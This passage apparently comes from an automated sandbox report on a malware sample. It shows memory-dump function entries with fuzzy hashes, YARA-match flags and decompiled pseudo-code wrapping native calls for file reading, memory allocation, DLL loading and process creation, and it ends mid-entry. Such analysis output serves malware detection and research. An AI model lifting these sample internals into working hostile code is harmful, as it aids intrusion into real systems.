Function 0183D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257719122.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e260aa7d4eec5616febf4142ed0a95566a9e8ae1fbabd20c8ce5c2b41f68a8cc
Instruction ID: f164e3369865b37315b36a9889584e382d42e21b20fd71c2d0462c033d33facc
Opcode Fuzzy Hash: e260aa7d4eec5616febf4142ed0a95566a9e8ae1fbabd20c8ce5c2b41f68a8cc
Instruction Fuzzy Hash: 4C11BB75904280DFCB02CF54C5C0B15BBB1FB84324F28C6A9D8498B656C33AE55ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0182D75D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257687062.000000000182D000.00000040.00000001.sdmp, Offset: 0182D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b20b498044b44ba7aba368574503ebdbc828ee5c80820f0f41d9be70be8233
Instruction ID: c9d52622e4ed4ccc4aaf942f8d975289133c1ed97a7e0c31cc76112f39dff4d7
Opcode Fuzzy Hash: 89b20b498044b44ba7aba368574503ebdbc828ee5c80820f0f41d9be70be8233
Instruction Fuzzy Hash: A701F7710093949EE7128B95C9C0B66BFD8EF51768F18C619EE049B286C37CD984CA71

Uniqueness

Uniqueness Score: -1.00%

Function 0182D75C, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257687062.000000000182D000.00000040.00000001.sdmp, Offset: 0182D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db6900ed029d1f3dd10a0b2dd191a38cb9c1709134bafee410616ff43bd517d9
Instruction ID: cc9a8acc15ce6a2761cf3ddd7cb382aa230e78727b2159c22c016f1d5a6aaf8b
Opcode Fuzzy Hash: db6900ed029d1f3dd10a0b2dd191a38cb9c1709134bafee410616ff43bd517d9
Instruction Fuzzy Hash: 9FF096714083949EE7118B59CDC4B63FFE8EF91774F18C55AED085B286C3789884CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00EA4C65, Relevance: 3.5, Instructions: 3452COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257092467.0000000000EA2000.00000002.00020000.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.257085996.0000000000EA0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0e7afa8a681787af96ababdf5891544254d221af9ff4f7ff61145da1fc527c2
Instruction ID: 9ef7c604d957948eff714ce13c2a2709febd49d482e9c7b66412ae1811c464c5
Opcode Fuzzy Hash: a0e7afa8a681787af96ababdf5891544254d221af9ff4f7ff61145da1fc527c2
Instruction Fuzzy Hash: 8043DF1204EBC21FD70387B82D316E6BFB66D9722434E64C7D8C08F5A3D2056A69E776

Uniqueness

Uniqueness Score: -1.00%

Function 030AC2B0, Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f534ee00102a2723055a4dd01d8c9d1e38c68cac6f00fedc71a7a185f53f8899
Instruction ID: cbef83f3400bc951277c70571ebf30b1d2f40c359fef1a2aa4bc2f536dc50a37
Opcode Fuzzy Hash: f534ee00102a2723055a4dd01d8c9d1e38c68cac6f00fedc71a7a185f53f8899
Instruction Fuzzy Hash: C8527CB9621B06CFD710CF58E48A1997FF1FB41318F91C20AE1629BAD0DBB4654AEF44

Uniqueness

Uniqueness Score: -1.00%

Function 030A9990, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 463a266da279e2c1ef90a344beeb3ee57f8ced88fea81045c7574c4926472b52
Instruction ID: 8af70ae3a381b3040acd63b82570f1646973ad45685ffda635f17c0ef702ae9d
Opcode Fuzzy Hash: 463a266da279e2c1ef90a344beeb3ee57f8ced88fea81045c7574c4926472b52
Instruction Fuzzy Hash: 7CA16E36E116198FCF05DFA9D8445DEBBB2FF89300B19856AE905BB221EB31A945CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: V5cfxBHd71.exe PID: 6092 Parent PID: 5700 V5cfxBHd71.exeCOMMON

Executed Functions

Function 004182AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004182AC(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t22;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;

				if(__eflags != 0) {
					asm("in al, dx");
					_t17 = _a8;
					_t34 = _a8 + 0xc48;
					E00418DB0(_t32, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
					_t6 =  &_a36; // 0x413d42
					_t12 =  &_a12; // 0x413d42
					_t22 =  *((intOrPtr*)( *_t34))( *_t12, _a16, _a20, _a24, _a28, _a32,  *_t6, _a40, _a44, _t33); // executed
					return _t22;
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t14 = __eax + 0x10; // 0x300
					_t15 = __eax + 0xc4c; // 0x40972f
					__esi = _t15;
					E00418DB0(__edi, _a4, __esi,  *_t14, 0, 0x2b) =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}

0x004182ae
0x00418262
0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9
0x004182b0
0x004182b1
0x004182b3
0x004182b6
0x004182bf
0x004182bf
0x004182cf
0x004182d5
0x004182d7
0x004182d8
0x004182d9
0x004182d9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 00418282, 00418290
B=A, xrefs: 0041829D, 004182A4

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
Instruction ID: 196597b99329607a985bdc56155312d81ebdbcd7e96d663e18f2c25ff9a64cf5
Opcode Fuzzy Hash: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
Instruction Fuzzy Hash: F9110972200204AFCB14DF99DC85EEB77A9EF8C754F158659BA1D97241CA30E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				asm("in al, dx");
				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}

0x00418262
0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 00418282, 00418290
B=A, xrefs: 0041829D, 004182A4

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B10(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0(__ebx, __edi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b2c
0x00409b2f
0x00409b34
0x00409b39
0x00409b43
0x00409b48
0x00409b4b
0x00409b4d
0x00409b55
0x00409b5a
0x00409b5a
0x00409b61
0x00409b69
0x00409b6c
0x00409b6e
0x00409b82
0x00000000
0x00409b84
0x00409b8a
0x00409b3e
0x00409b3e
0x00409b3e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041838B, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041838B(signed int __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t25;
				signed int _t29;

				_t18 = __ebx & _t29;
				asm("outsd");
				 *((intOrPtr*)(_t18 + 0x55)) =  *((intOrPtr*)((__ebx & _t29) + 0x55)) - _t18;
				_push(_t29);
				_t12 = _a4;
				_t5 = _t12 + 0xc60; // 0xca0
				E00418DB0(_t25, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}

0x0041838b
0x0041838d
0x0041838e
0x00418390
0x00418393
0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
Instruction ID: e33716c473c1a6e546ff089dea15d4fac4e1bd4e2ae9c8d374149b142e10dc26
Opcode Fuzzy Hash: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
Instruction Fuzzy Hash: 1BF0F2B6200208ABCB18DF99DC95EEB77A9BF88354F15815DBE1897241C630E950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00418447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Strings

hA, xrefs: 0041846C, 00418477

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: hA
API String ID: 1279760036-1221461045
Opcode ID: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
Instruction ID: a92fe9ae98136920995dbb6c9f8f490c0a28fc78c4328f558ebb06bb2a3a51d6
Opcode Fuzzy Hash: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
Instruction Fuzzy Hash: D1F04F763002156FDA24EF99EC84EE7736DEF88360B10855AFA4D9B201D931EA5587E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041852D, Relevance: 3.1, APIs: 2, Instructions: 54processCOMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CreateExitInternal
String ID:
API String ID: 4273315900-0
Opcode ID: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
Instruction ID: 90963e86cd57150ed095c23e32252a4bc52356d2fee715913416bcb79a385e3c
Opcode Fuzzy Hash: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
Instruction Fuzzy Hash: B60117B2200208BBCB44DF99DC80DEB77ADEF8C354F118249FA0D97241DA34E951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00407260(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ac
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418530, Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418530(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t34 = _a4 + 0xc80;
				E00418DB0(_t33, _t16, _t34,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t22;
			}

0x00418533
0x00418542
0x0041854a
0x00418584
0x00418588

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction ID: 513559d71bb74bdb0002c37f9039ea76381332b5628ed031e04d017542a4cadc
Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction Fuzzy Hash: A3015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251DA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004184B4, Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004184B4(void* __ecx, void* __edx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t12;

				_push(0x3c);
				 *((intOrPtr*)(__ecx + 0x5506bd67)) =  *((intOrPtr*)(__ecx + 0x5506bd67)) - __edx;
				_t9 = _v0;
				_t5 = _t9 + 0xc74; // 0xc74
				E00418DB0(0x21c5d300, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t12;
			}

0x004184b4
0x004184bb
0x004184c3
0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
Instruction ID: c5ff80edf742f8a68fdad7a16a09cf22f23f4b8e9e8c60093caf9f0ba1e94a67
Opcode Fuzzy Hash: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
Instruction Fuzzy Hash: ADE06DB1200304ABDB14DF65DC49EA7376CAF88750F114199FE085B382D531E901CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}

0x00418497
0x0041849f
0x004184a2
0x004184a6
0x004184ab
0x004184ad
0x004184b1

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

